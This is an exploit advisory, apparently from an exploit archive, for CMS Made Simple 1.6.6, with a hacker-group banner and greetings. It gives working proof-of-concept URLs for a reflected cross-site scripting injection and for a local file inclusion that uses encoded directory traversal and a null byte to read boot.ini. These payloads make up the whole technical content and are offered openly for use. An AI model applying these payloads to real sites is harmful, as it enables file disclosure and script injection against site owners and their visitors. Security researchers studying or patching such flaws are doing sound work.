[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : CMS Made Simple 1.6.6 Multiple Vulnerabilities
# Published : 2010-02-12
# Author : Beenu Arora
# Previous Title : Alqatari Group Version 1.0 Blind SQL Injection Vulnerability
# Next Title : daChooch Remote Sql Injection Vulnerability
################################################################
# .___ __ _______ .___ #
# __| _/____ _______| | __ ____ _ __| _/____ #
# / __ |__ \_ __ |/ // ___/ /_ / __ |/ __ #
# / /_/ | / __ | | / < ___ _/ / /_/ ___/ #
# ____ |(______/__| |__|_ \_____>_____ /_____|____ #
# / / / #
# ___________ ______ _ __ #
# _/ ____ __ _/ __ / / / #
# ___| | / ___/ / #
# ___ >__| ___ >/_/ #
# est.2007 / / forum.darkc0de.com #
################################################################
# Greetz to all Darkc0de ,AI,ICW, AH Memebers
# Shoutz to r45c4l,j4ckh4x0r,silic0n,smith,baltazar,d3hydr8,FB1H2S, lowlz,Eberly,Sumit,
#
# Author: Beenu Arora
#
# Home : www.BeenuArora.com
#
# Email : beenudel1986@gmail.com
#
# Share the c0de!
#
################################################################
#
# Exploit: Multiple Vulnerablities in cmsmadesimple
#
# AppSite: http://www.cmsmadesimple.com/
#
# Tested Version : 1.6.6
# XSS
#
# POC:-http://localhost/cmsmadesimple/index.php?page=tags-in-the-core&showtemplate=false"><script>alert('XSS')</script>
#
#
#
# Multiple Local File Inclusion
#
# Sample URL:
# POC:-http://server/cmsmadesimple/index.php?mact=News%2ccntnt01%2c%5c..%5c..%5c%5c..%5c..%5c%5c..%5c..%5c%5c..%5c..%5c%5c..%5c..%5c%5cboot.ini%00%2c0&cntnt01articleid=1&cntnt01showtemplate=false&cntnt01returnid=39
#
#
################################################################